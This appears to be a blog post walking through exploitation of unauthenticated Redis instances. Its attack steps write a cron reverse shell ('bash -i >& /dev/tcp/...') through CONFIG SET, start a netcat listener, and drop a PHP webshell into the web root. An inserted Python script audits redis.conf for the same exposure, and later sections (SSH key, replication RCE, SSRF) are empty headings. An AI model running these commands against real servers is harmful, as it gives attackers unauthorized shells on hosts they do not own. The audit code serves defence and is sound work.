xfeng

Reproducing the Redis Unauthorized Access Vulnerability

1. Vulnerability Introduction

By default, Redis is bound to 0.0.0.0:6379. If no mitigating measures are taken, such as firewall rules that block access from untrusted sources, the Redis service is exposed to the public network. If no password is configured (it is usually empty), any user who can reach the target server can access Redis without authentication and read its data.

An attacker can combine this unauthorized access with Redis's own config command to log in to the target server, add scheduled tasks, write webshells, and perform other operations.

The following steps assume a Redis instance that already has the unauthorized access vulnerability.

2. Exploiting Scheduled Tasks to Reverse Shell

https://github.com/caoxinyu/RedisClient/releases

https://github.com/dmajkic/redis/downloads

Run the following commands from a Redis client connected to the vulnerable host:

set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

Run the following listener command locally:

nc -lvnp Port

3. Writing Webshell in Redis

config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save
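Sections 2 and 3 both depend on the same preconditions: a reachable, unauthenticated Redis whose CONFIG command can retarget the RDB dump (dir and dbfilename) at the cron spool or the web root. The following added example, not code from the original post, audits a redis.conf for exactly those conditions and flags a data directory that already points at such a target; the directive names are real redis.conf directives, the sample configs are constructed.

```python
"""Audit a redis.conf for the exposure conditions this page describes.
Constructed example, not the post's code; sample configs are made up."""

# Persistence targets the page's technique relies on (cron spool, web root)
# plus the SSH key path: a data dir pointing here is an indicator of tampering.
SUSPICIOUS_DIRS = ("/var/spool/cron", "/etc/cron", "/var/www", "/.ssh")

def parse_conf(text):
    """Map each directive (lower-cased) to the list of its argument lists."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit_conf(text):
    """Return human-readable findings; an empty list means nothing flagged."""
    conf = parse_conf(text)
    findings = []
    bind = conf.get("bind", [[]])[-1]  # no bind line means every interface
    if not bind or any(b in ("0.0.0.0", "*", "::") for b in bind):
        findings.append("bind: Redis listens on all interfaces")
    if conf.get("protected-mode", [["yes"]])[-1] == ["no"]:
        findings.append("protected-mode: disabled")
    if conf.get("requirepass", [[]])[-1] in ([], ['""']):
        findings.append("requirepass: no password, any client may run CONFIG SET")
    renamed = {r[0].upper() for r in conf.get("rename-command", []) if r}
    if "CONFIG" not in renamed:  # Redis 6+: an ACL denying @dangerous also works
        findings.append("rename-command: CONFIG is still reachable")
    d = conf.get("dir", [[]])[-1]
    if d and any(s in d[0] for s in SUSPICIOUS_DIRS):
        findings.append(f"dir: RDB path {d[0]} matches a known injection target")
    return findings

WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\ndir /var/spool/cron/\ndbfilename root\n"
HARDENED_CONF = """bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_conf(conf) or ["no findings"])
```

The same dir/dbfilename check can be run against a live instance's CONFIG GET output during incident response, since an RDB file parked in /var/spool/cron or /var/www/html is the footprint both sections leave behind.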

4. Logging in to SSH with Redis Key

5. Exploiting Master-Slave Replication for RCE

6. SSRF Redis Reverse Shell

7. Reference Video
